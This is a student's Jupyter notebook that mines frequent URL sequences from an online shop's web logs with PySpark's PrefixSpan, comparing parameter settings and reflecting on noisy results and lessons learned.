|[[/favicon.ico]]                                                                                                    |1603|
|[[/settings/logo]]                                                                                                  |2931|
|[[/settings/logo], [/basket/checkout]]                                                                              |1633|
|[[/sett

In [None]:
results = dict()
support_params = [0.5, 0.2]
max_pattern_params = [100, 50, 30, 9]

for min_support in support_params:
    results[min_support] = dict()
    for max_pattern_length in max_pattern_params:
        print(min_support, max_pattern_length)
        prefixSpan = PrefixSpan()
        prefixSpan.setSequenceCol('SEQUENCE')
        prefixSpan.setMinSupport(min_support)
        prefixSpan.setMaxPatternLength(max_pattern_length)
        result = prefixSpan.findFrequentSequentialPatterns(DF2).sort('freq', ascending=False)
        result.show()
        results[min_support][max_pattern_length] = result

0.5 100
+--------------------+----+
|            sequence|freq|
+--------------------+----+
|  [[/settings/logo]]|2931|
|[[/settings/logo]...|2750|
|[[/settings/logo]...|2547|
|[[/settings/logo]...|2319|
|[[/static/images/...|2198|
|[[/static/images/...|2194|
|[[/static/images/...|2192|
|[[/static/images/...|2191|
|[[/static/images/...|2190|
|[[/static/images/...|2187|
|[[/static/images/...|2186|
|[[/static/images/...|2185|
|[[/settings/logo]...|2101|
|[[/static/images/...|2097|
|[[/static/images/...|2090|
|[[/static/images/...|2089|
|[[/static/images/...|2086|
|[[/static/images/...|2084|
|[[/static/images/...|2067|
|[[/static/images/...|2041|
+--------------------+----+
only showing top 20 rows

0.5 50
+--------------------+----+
|            sequence|freq|
+--------------------+----+
|  [[/settings/logo]]|2931|
|[[/settings/logo]...|2750|
|[[/settings/logo]...|2547|
|[[/settings/logo]...|2319|
|[[/static/images/...|2198|
|[[/static/images/...|2194|
|[[/static/images/...|2192|
|[[/sta

In [None]:
results = dict()
support_params = [0.5, 0.4, 0.2]
max_pattern_params = [50, 30, 9, 5, 4]

for min_support in support_params:
    results[min_support] = dict()
    for max_pattern_length in max_pattern_params:
        print(min_support, max_pattern_length)
        prefixSpan = PrefixSpan()
        prefixSpan.setSequenceCol('SEQUENCE')
        prefixSpan.setMinSupport(min_support)
        prefixSpan.setMaxPatternLength(max_pattern_length)
        result = prefixSpan.findFrequentSequentialPatterns(DF2).sort('freq', ascending=False)
        result.show()
        results[min_support][max_pattern_length] = result

0.5 50
+--------------------+----+
|            sequence|freq|
+--------------------+----+
|[[/static/images/...|1589|
|[[/static/images/...|1590|
|[[/static/images/...|1591|
|[[/static/images/...|1591|
|[[/static/images/...|1591|
|[[/static/images/...|1592|
|[[/static/images/...|1597|
|[[/static/images/...|1597|
|[[/static/images/...|1597|
|[[/static/images/...|1598|
|[[/static/images/...|1599|
|[[/static/images/...|1600|
|[[/static/images/...|1601|
|[[/static/images/...|1601|
|[[/static/images/...|1601|
|[[/static/images/...|1601|
|    [[/favicon.ico]]|1603|
|[[/static/images/...|1603|
|[[/static/images/...|1605|
|[[/static/images/...|1605|
+--------------------+----+
only showing top 20 rows

0.5 30
+--------------------+----+
|            sequence|freq|
+--------------------+----+
|[[/static/images/...|1589|
|[[/static/images/...|1590|
|[[/static/images/...|1591|
|[[/static/images/...|1591|
|[[/static/images/...|1591|
|[[/static/images/...|1592|
|[[/static/images/...|1597|
|[[/stat

In [None]:
results.get(0.2).get(50).sort('freq', ascending=False).show(truncate=False, n=100)

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----+
|sequence                                                                                                                                                              |freq|
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----+
|[[/settings/logo]]                                                                                                                                                    |2931|
|[[/settings/logo], [/settings/logo]]                                                                                                                                  |2750|
|[[/settings/logo], [/settings/logo], [/settings/logo]]                                                                           

In [None]:
results.get(0.5).get(50).sort('freq', ascending=False).show(truncate=False, n=100)

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----+
|sequence                                                                                                                                                              |freq|
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----+
|[[/settings/logo]]                                                                                                                                                    |2931|
|[[/settings/logo], [/settings/logo]]                                                                                                                                  |2750|
|[[/settings/logo], [/settings/logo], [/settings/logo]]                                                                           

In [None]:
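# Requires the first parameter sweep (max lengths 100/50/30/9) to be the last one run:
# the second sweep rebuilds `results` without a max length of 100, so .get(100) would be None
final_prefixspan = results.get(0.2).get(100)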
final_prefixspan.printSchema()
# final_prefixspan.where(F.array_contains(col("sequence.element"),'settings')).show(false)
# final_prefixspan.filter(~final_prefixspan.sequence.contains('settings')).show()

# df_basket_add = df_no_css.filter(df_no_css.request_url.contains('/basket/add'))
# df_basket_add.show(truncate=False)
# print(df_basket_add.count())

explode_test = final_prefixspan.select(F.explode(col("sequence")).alias("element"), col("freq"))
explode_test.show()

root
 |-- sequence: array (nullable = false)
 |    |-- element: array (containsNull = false)
 |    |    |-- element: string (containsNull = false)
 |-- freq: long (nullable = false)

+--------------------+----+
|             element|freq|
+--------------------+----+
|    [/settings/logo]|2931|
|    [/settings/logo]|2750|
|    [/settings/logo]|2750|
|    [/settings/logo]|2547|
|    [/settings/logo]|2547|
|    [/settings/logo]|2547|
|    [/settings/logo]|2319|
|    [/settings/logo]|2319|
|    [/settings/logo]|2319|
|    [/settings/logo]|2319|
|[/static/images/a...|2198|
|[/static/images/a...|2194|
|[/static/images/g...|2192|
|[/static/images/g...|2191|
|[/static/images/a...|2190|
|[/static/images/g...|2187|
|[/static/images/g...|2186|
|[/static/images/g...|2185|
|    [/settings/logo]|2101|
|    [/settings/logo]|2101|
+--------------------+----+
only showing top 20 rows



In [None]:
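# Note: array_contains tests for an exactly equal element, so the prefix '/static/images'
# does not remove full image URLs (they still appear in the output below)
explode_test.where(~F.array_contains(col('element'), '/static/images')) \
    .where(~F.array_contains(col('element'), '/settings/logo')) \
    .show(truncate=False)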


+-----------------------------------------------------------------------------------+----+
|element                                                                            |freq|
+-----------------------------------------------------------------------------------+----+
|[/static/images/amp/instagram.png]                                                 |2198|
|[/static/images/amp/telegram.png]                                                  |2194|
|[/static/images/guarantees/goodShopping.png]                                       |2192|
|[/static/images/guarantees/support.png]                                            |2191|
|[/static/images/amp/blog.png]                                                      |2190|
|[/static/images/guarantees/fastDelivery.png]                                       |2187|
|[/static/images/guarantees/warranty.png]                                           |2186|
|[/static/images/guarantees/bestPrice.png]                                          |2185|
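`F.array_contains` compares whole array elements for equality, so `'/static/images'` only matches an element that is exactly that string, which is why the static-image URLs remain in the output above. The plain-Python sketch below contrasts the two tests on one exploded `element`. In PySpark 3.1 or later, a prefix test over the array could be written as `F.exists(col('element'), lambda x: x.startswith('/static/images'))`; this is a suggestion, not something run in this notebook.

```python
# One exploded `element` (an itemset of URLs) like those in the output above
element = ["/static/images/amp/instagram.png"]

# What array_contains(col('element'), '/static/images') checks: an exactly equal element
exact_hit = "/static/images" in element

# What the filter was presumably meant to check: a URL starting with the prefix
prefix_hit = any(url.startswith("/static/images") for url in element)

print(exact_hit, prefix_hit)  # False True
```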

In [None]:
explode_test2 = explode_test.select(F.explode(col("element")).alias("element2"), col("freq"))

In [None]:
# Drop URLs that are page furniture (images, static assets, settings, basket, analytics);
# equivalent to chaining one ~contains(token) filter per token
noise_tokens = ['png', 'settings', 'favicon', 'basket', 'alexaGooleAnalitic', '/image', '/static']
page_views = explode_test2
for token in noise_tokens:
    page_views = page_views.filter(~page_views.element2.contains(token))
page_views.show(truncate=False)

+----------------------------------------------------------------------------------------------------+----+
|element2                                                                                            |freq|
+----------------------------------------------------------------------------------------------------+----+
|/                                                                                                   |894 |
|/                                                                                                   |883 |
|/amp-helper-frame.html?appId=a624a1c1-0c93-466a-a546-e146710f97e6&parentOrigin=https://www.zanbil.ir|878 |
|/                                                                                                   |858 |
|/amp-helper-frame.html?appId=a624a1c1-0c93-466a-a546-e146710f97e6&parentOrigin=https://www.zanbil.ir|826 |
|/site/enamad                                                                                        |819 |
|/                          

## <font color=red>Your summary and conclusions here </font>

# Conclusion

I ended up with a minimum support of 0.2 and a high maximum pattern length of 100.
However, the most frequent patterns were not of interest, because they fell into one of the following categories:
1. '/settings'
2. '/static' or '.png' or 'images'
3. '/alexaGooleAnaliticalexaGooleAnalitic'

These are requests that would occur regardless of whether a user bought a product (at least, it seems so). Since redoing the filtering at this stage would have been too expensive in time and computation, I tried to explode the result data frame to see whether I could find any other patterns. However, I again mostly found patterns of irrelevant behavior, such as site or HTML settings.

In addition, I compared the results for different minimum supports and maximum pattern lengths, and noticed that the most frequent patterns were about the same.

So what can we learn exactly? Here are my top 3 lessons and discoveries.

1. 80-90% of the time in the model-building process is spent on finding the best data (with data integration if necessary) and cleaning it so that the model can read it. Once we get to the actual model building, a large portion of the time is spent just waiting for the code to finish running, due to computational limits.

2. Prepare early. I should have looked at the most frequent URLs before running PrefixSpan, to eliminate unnecessary URLs that would interfere with the results. I realized this too close to the deadline to act on it, so I should have planned earlier.

3. When working with large amounts of data, it's important to test your code on smaller subsets first. Otherwise you may not realize that your code doesn't work until near the end of the project.
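Lesson 2 suggests removing non-page URLs before running PrefixSpan. A minimal plain-Python sketch of that cleanup follows; the prefix list is an assumption drawn from the noisy patterns listed above, not a tested choice. In Spark, the same idea could be applied to `request_url` before building `EVENTS`.

```python
# Hypothetical noise prefixes, based on the frequent but uninformative patterns above
NOISE_PREFIXES = ("/settings/logo", "/static/", "/image/", "/favicon.ico")


def strip_noise(sequence, prefixes=NOISE_PREFIXES):
    """Drop noise URLs from every event, then drop events left empty."""
    cleaned = []
    for event in sequence:
        kept = [url for url in event if not url.startswith(prefixes)]
        if kept:
            cleaned.append(kept)
    return cleaned


seq = [["/settings/logo"], ["/", "/static/images/amp/blog.png"], ["/product/10214"], ["/favicon.ico"]]
print(strip_noise(seq))  # [['/'], ['/product/10214']]
```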


# DELIVER (individually)



Submit on Canvas:

* This notebook with all results shown
* If you discussed the project with classmates and got inspiration from them, write down their names in the next section. There is no point deduction, but you have to be honest.



I briefly discussed progress with Kenny, Bo, Ian Shyue, and Yuming.

<font size="+2" color="#003300">I hereby declare that, except for the code provided by the course instructors, all of my code, report, and figures were produced by myself.</font>